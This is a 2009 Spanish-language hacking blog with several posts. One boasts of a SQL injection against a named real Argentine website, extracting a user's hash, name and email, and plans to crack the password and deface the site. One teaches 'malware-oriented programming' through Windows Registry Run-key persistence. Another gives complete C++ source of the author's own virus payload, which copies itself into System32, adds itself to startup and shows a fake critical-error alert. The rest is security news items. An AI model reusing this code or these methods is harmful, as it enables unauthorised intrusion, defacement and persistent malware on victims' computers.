SQL Injection en el Bolson Patagonia Argentina [BolsonWeb]

on viernes, 25 de septiembre de 2009

Bueno, aca dejo un bug que conseguinos un amigo argentino TheNachoX y yo en la web patagonica jeje.


He aqui la web.

El post que tiene la inyección es aqui.  

La ultimas columnas aqui

La columna 19 de donde sacaremos información, aqui. 

Aqui listamos las tablas dentro de esa columna, y empezamos ha hacer las consultas.

Usuario, aqui la consulta.  

El hash del usuario, supongo que esta en md5, cunsulta aqui

Nombre, aqui

Email, aqui


Bueno creo que es todo, nomas falta conseguir crackear el pass y buscar el logearse y listo, ha hacer deface. 

SecPoint lanza el sistema de pruebas de penetración Penetrator 7.0

La firma especializada en seguridad SecPoint ha lanzado su más avanzado sistema de pruebas de penetración para clientes corporativos. El producto, Penetrator 7.0, protege frente a los ataques más comunes, incluidos los de inyección SQL y los de Cross Site Scripting.

Los ataques de inyección SQL aprovechan las deficiencias del análisis de la información devuelta de las peticiones de páginas web. Utilizando caracteres específicos es posible hacer que comandos SQL lleguen a las bases de datos que soportan un sitio web. Esta técnica es popular porque si un hacker consigue “interrogar” lo suficiente a la base de datos, puede llegar a extraer de ella información sensible, como los números de tarjetas de crédito de los clientes de la empresa tomada como víctima.
Por ejemplo, el pasado agosto los documentos presentados ante un tribunal estadounidense mostraron cómo los hackers habían conseguido por este sistema robar 130 millones de números de tarjetas de crédito y débito de Heartland Payment Systems aprovechando las vulnerabilidades que una adecuada prueba de penetración hubiera identificado.
En este contexto, Penetrator 7.0, SecPoint ayuda a identificar ataques con su motor de rastreo automático. El producto proporciona además 50 diccionarios de 50 idiomas para redes WPA2 y protege frente a los intentos de los hackers de aprovechar las redes wireless abiertas de las empresas.
Para los administradores TI que realizan su trabajo en movimiento, la compañía ofrece Portable Penetrator, que se suministra precargado sobre un laptop y proporciona análisis de vulnerabilidades y auditoría de seguridad Wi-Fi para redes con protocolos de seguridad WEP, WPA y WPA2.
Tanto Penetrator como Portable Penetrator pueden escanear múltiples localizaciones remotas proporcionando después informes centralizados.
Finalmente, la alternativa Online Penetrator permite a los clientes suscribirse al servidor cloud de SecPoint y escanear sus direcciones IP corporativas para la detección de vulnerabilidades en remoto.
 
 
 

Un Gran Padre

on jueves, 24 de septiembre de 2009

Copy paste:

El hijo le preguntó a su padre, 'Papá, formarias parte en el maratón conmigo? El padre respondió, si'

Fueron al maratón y lo completaron juntos. Padre e hijo fueron juntos a otros maratones, el padre siempre decía 'si' a las
solicitudes de su hijo de ir juntos en las carreras. Un día, el hijo le preguntó a su padre, ' Papá, vamos a participar juntos en el 'Ironman' ' El padre le dijo si tambien.

El triatlón Ironman abarca un 2,4 millas ( 3,86 kilómetros ) nadando en los océanos, seguida por una 112 millas (180,2 kilometros) paseo en bicicleta, y terminando con un 26,2 millas (42,195 kilometros) maratón a lo largo de la costa de Big Island. 


Esto es digno de ver..


Nota\: Este tema fue posteado por xassiz en la comunidad de e-r00t, ahi os dejo la fuente tal como debe de ser.
 

Saludos.

Gmail sufre "fallos" en todo el mundo, que ocasionan problemas a algunos usuarios




El servicio de correo de Google, 'Gmail', está sufriendo "fallos" en las últimas horas todo el mundo, que ocasionan problemas para acceder a las cuentas de e-mail de algunos usuarios, según confirmó la compañía a Europa Press. 

  Así, 'Google' desconoce aún el motivo de los fallos, por lo que evitó ofrecer más explicaciones. Recomendó, no obstante, utilizar su aplicación 'Dashboaerd', que mantiene a los usuarios al corriente de sus diferentes aplicaciones, entre ellas, el correo electrónico. 

  No es la primera vez que el servicio de e-mail del gigante de las comunicaciones sufre problemas. El pasado 1 de septiembre el servicio también se 'cayó', algo que también ocurrió en febrero de este mismo año.

El Spam más profesional que nunca

SPAM, correo o sms basura a los mensajes no solicitados, habitualmente de tipo publicitario, enviados en grandes cantidades que perjudican de alguna ¡manera al receptor, ahora más profesional que nunca.

El SPAM cada día está mejor diseñado, esta es la conclusión después del estudio realizado por Antispameurope sobre la evolución de los correos basuras en el mundo. El volumen de estos ha descendido, sin embargo el aspecto que tienen son cada vez mejores ofreciendo regalos, ayudas o consejos irresistibles. Es por ello que se puede decir que los cibercriminales se convierten en profesionales del Spam.

Al parecer los hacker se han dado cuenta que vale más la calidad que la cantidad, por esto mismo el volumen de envíos ha decrecido, pero los que existen son más complicados de detectar, al menos eso afirma un estudio realizado por Antispameurope.

El estudio afirma que a los hacker "no le interesa tanto enviar una gran cantidad de mensajes sin resultado alguno, si no enviar mensajes efectivos con los que puedan obtener resultados". Pro esto es necesario extremar las medidas para evitar dichos correos basuras.

Resaltar que en el último año cada usuario recibió una media de 12.500 correos de spam al mes. Una cantidad menos que los años anteriores, cuando estos no bajaban de los 38.500 al mes por usuario.



Escribiendo en el registro de Windows desde C++

on martes, 22 de septiembre de 2009

Primero que nada debo aclarar que no soy ningún experto en programación, y lo que aquí les mostrare es algo básico de lo que llamo POM (Programación Orientada a Malware), talvez cuando yo aprenda mas sobre (POM), pueda hacer un escrito que se entienda de cómo programar un engendro desde cero, pero por ahora tengo pocos conocimientos sobre ello, así que se aceptan críticas y cualquier error o sugerencia, me gustaría, me lo dijeran en el blog o me lo notificaran vía E-mail.

Cada vez que alguien intenta iniciarse en el mundo de la programación vírica, por muy programador profesional que sea, si no se tiene una noción minima de cómo funciona un virus, de seguro tendrá problemas, la idea de este escrito es que los mas iniciados sepan como manipular el registro de Windows e iniciar sus bichos en cada inicio del computador, desactivar funciones, modificar valores y otras cosas mas.

De antemano me permito aclarar que el código que aquí se presente será compilado sin pro
blemas en Dev-C++ 4, pero que también debería compilarse sin problemas en CodeBlocks, entonces vallamos de lleno al tema.

Si hemos explorado alguna vez el registro de Windows habremos podido notar que de entrada el registro se divide en 5 ramas, las cuales son:

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_CURRENT_CONFIG



Cada una de las entradas anteriores cuenta con subcadenas, subclaves o rutinas de caracteres, estos mismos son los encargados de que Windows funcione tal como usted lo ve, pero por ahora no me pondré a explicar que significa cada uno de las entradas anteriores ya que no quiero que con este tema redacte mas de 10 hojas, mejor nos centraremos directamente en HKEY_LOCAL_MACHINE que es donde se encuentra la configuración mas importante de Windows y también donde se encuentran los programas que se inician automáticamente al arrancar Windows, que como es obvio por ahora es lo que nos interesa y para poder verlos solo basta abrir las subcarpetas o subcadena siguiente:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Como he dicho antes todo lo que se encuentre en esa cadena se iniciara automáticamente al arrancar Windows y es ahí donde también nosotros escribiremos.

Pero para poder escribir en el registro desde C++ debemos conocer antes que nada 4 funciones muy importantes para lograr nuestro objetivo.


HKEY hkey; esta función se declara para obtener la llave o cadena que queremos abrir.

RegCreateKey; Esta función nos permite escribir una ruta nueva en el registro de Windows y mas adelante veremos como funciona.

RegOpenKeyEx;
Esta función API se declara para abrir el registro.

RegSetValueEx; Esta se declara para escribir en el registro algún valor.

RegCloseKey; Esta función como ya se pudieron haber dado cuenta sirve para cerrar el registro.

Pero como todos dicen lo mejor para entender esto es practicando, a continuación presentare un pequeño código en el que se podrá apreciar las funciones antes expuestas.



HKEY hKey; // Llamamos a HKEY
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey,"Nombre del virus",0,REG_SZ,(const unsigned char*)s,sizeof(Ruta donde esta nuestro virus));
RegCloseKey(hKey);



Es todo por el momento, espero sea útil.

Un hacker argentino detenido se niega a ser extraditado al país

Se trata de Iván Velásquez investigado por hackear los correos electrónicos de funcionarios del gobierno, jueces y miembros de la farándula. Esta detenido desde hace un año en Uruguay acusado de espionaje. También lo investigan en Chile por la violación del mail del Ministro de Defensa.


El ex agente de la Policía de Seguridad Aeroportuaria (PSA) Iván Velásquez se negó a ser extraditado a la Argentina. La jueza Sandra Arroyo Salgado pidió su extradición acusándolo de ser uno de los responsables de la violación de los correos electrónicos de ministros, jueces y personajes de la farándula. 

En el pais vecino, el ex agente de la PSA está acusado de violar los mails de políticos y entregar la información a servicios de inteligencia de terceros países. Por un mismo caso esta siendo investigado en Chile donde habría hackeado el correo electrónico del Ministro de Defensa de ese país.

Fuentes vinculadas a la investigación señalaron a Online-911 que además estaría demostrado que en las computadoras secuestradas del domicilio de Velásquez se encontraron gran de candidad de programas espías, que son utilizados para ingresar a las computadoras.

A pesar de que en varios medios de prensa Velásquez señaló que estaba dispuesto a declarar e incluso señaló que revelaría muchos secretos guardados de forma sorpresiva se negó a que la Justicia argentina lo interrogue.

En la causa que se lleva adelante en San Isidro también están imputados su compañero en la PSA Pablo Carpintero, el ex jefe de la SIDE, Juan Bautista "Tata" Yofre, el ex Secretario General del Ejército Daniel Reimundes y el titular del portal Seprin, Héctor Alderete. Además no se descarta que se investigue a otros polítcos y empresarios que habrían comprado los mails robados. Los correos también llegaron a periodistas como Roberto García, el desaparecido Bernardo Neustadt o Edgard Mainhard del portal Urgente 24.

La justicia los acusó de conformar una asociación ilícita con el objeto de robar información de los correos electrónicos entre otros de los ministros de Defensa, Nilda Garré, el Canciller Jorge Taiana, el ex jefe de Gabinete Alberto Fernández, el embajador Héctor Timerman y de los secretarios privados de la presidenta Cristina Fernández de Kirchner.

El 18 de agosto, en la causa, fue citado a declarar el ex jefe de Gabinete, Alberto Fernández luego que denunciara que estaba siendo espiado y sus mails violados. Ante la jueza señaló que no cree "que los organismos de inteligencia estatales esten detrás del hackeo de su cuenta de mail", pero agregó que "cualquier funcionario o privado puede contratar una empresa" que se dedica a este tipo de actividades.

El 12 de julio pasado la Sala Tercera de la Cámara de Casación determinó devolver el expediente al juzgado federal de San Isidro a cargo de Sandra Arroyo Salgado luego de más de un año donde la causa estuvo paralizada por un conflicto de competencia. 

En Uruguay, la causa por espionaje está en manos de la jueza Mariana Mota; en tanto que la causa por la extradición esta en manos del juez Roberto Timbal.

Via: www.online-911.com

Un payload de Win32.mdc.A

Ahi dejo un codigo, que escribi hace tiempecito, bueno lo que hace es sencillo, y lo use en un bichito que se llamo Win32.mdc.A lo hice hace meses, no era muy grande, solo residia en el PC, se inciaba junto con el sistema y se copiaba en diskettes de 3 1/2, nunca salio de mi computadora. hasta que perdi toda mi información y esto fue parte de las cosas que he logrado recuperar.


Este code lo que hace es tomar el path de System32 y se copia ahi se inicia a cada incio de sesion del sistema y como payload muestra un mensaje de alerta.

// Mensaje de alerta critca con API MessageBoxA
// http://whmd.blogspot.com
// http://ethical-security.co.cc
// http://bugdox.org

#include <windows.h>
#include 
<string.h>

char windir[MAX_PATH];

int APIENTRY WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
 char pathname[256];
 GetWindowsDirectory(windir, sizeof(windir));
 HMODULE hMe = GetModuleHandle(NULL);
 DWORD nRet = GetModuleFileName(hMe, pathname, 256);
 HKEY hKey;
 strcat(windir, "\\System32\\Alerta.exe");
 CopyFile(pathname, windir, 0);

 RegCreateKey (HKEY_CURRENT_USER, "Software\\z1z30f", &hKey);
 RegSetValueEx (hKey, "Alert", 0, REG_SZ, (LPBYTE) windir, sizeof(windir));


 MessageBox (0, "Error critico del sistema", "Fatal error...", MB_ICONERROR | MB_OK); // Mensjae critico

 RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey);
 RegSetValueEx (hKey, "Alert", 0, REG_SZ, (LPBYTE)windir, sizeof(windir));
 return 0;
}
 


Otros ejemplos:

MessageBox (0, "alerta de ayuda", "Error", MB_ICONQUESTION | MB_OK); // Ayuda
MessageBox (0, "alerta de advertencia", "Error", MB_ICONEXCLAMATION | MB_OK); // Advertencia

Aqui una lista de estilos
MB_ABORTRETRYIGNORE
MB_APPLMODAL
MB_DEFAULT_DESKTOP_ONLY
MB_HELP
MB_ICONASTERISK
MB_ICONERROR
MB_ICONEXCLAMATION
MB_ICONHAND
MB_ICONINFORMATION
MB_TASKMODAL


Como pueden ver no es gran cosa, pues ahi lo dejo como aporte.
Saludos.

 


Hackers cobran 100 dólares para robar contraseñas de FaceBook

on lunes, 21 de septiembre de 2009


 

Los usuarios de FaceBook se enfrentan a un nuevo problema, ya que supuestos hackers diseñaron un servicio en línea para poder ingresar al 99 por ciento de las cuentas de dicha red social.

La empresa de seguridad online Panda detectó un dominio en donde ofrecen poner al descubierto las identidades en FaceBook, y que se puede ingresar a la mayoría de las cuentas de cualquier usuario, ya sea de algún artista, político o marca publicitaria.

El mencionado portal destaca que se aprovechan de los agujeros de seguridad de FaceBook para ingresar al 99 por ciento de las cuentas.

Los hackers proporcionan por cien dólares el nombre de un usuario con su contraseña para ingresar a la mayoría de las cuentas.

Para solicitar el servicio, primero se tiene que realizar un pago online a través de Western Union. El país receptor se ubica en Ucrania, pero el dominio está registrado en Moscú.

De acuerdo con la información que proporciona la página, tienen experiencia de cuatro años; sin embargo sólo tiene unos días según Panda.

Cuando se tienen el acceso a las cuentas, se pueden enviar a la red VIRUS, SPAM o incluso distribuir información falsa en nombre del personaje al que se suplanta.
 

Windows 7 el Sistema mas seguro hasta el momento.

Expertos en seguridad informatica y hackers afirman que el último sistema operativo de Apple, Mac OS X 10.6, Snow Leopard, es menos seguro que el proximo Windows 7.

Los expertos de seguridad han criticado que el sistema operativo trae desactivado de serie el cortafuegos además de no tener la posibilidad de recibir actualizaciones automáticas y también unos esfuerzos muy débiles antiphising en Safari, y que Apple lanzó al mismo con una versión de Adobe Flash vulnerable a ataques, aunque ya lo han solucionado en la primera actualización del mismo.

Un importante hacker de Mac ha hecho notar la diferencias en seguridad, confirmando que Apple no ha mejorado nada, y ha afirmado que ello hace Snow Leopard más inseguro que el venidero Windows 7.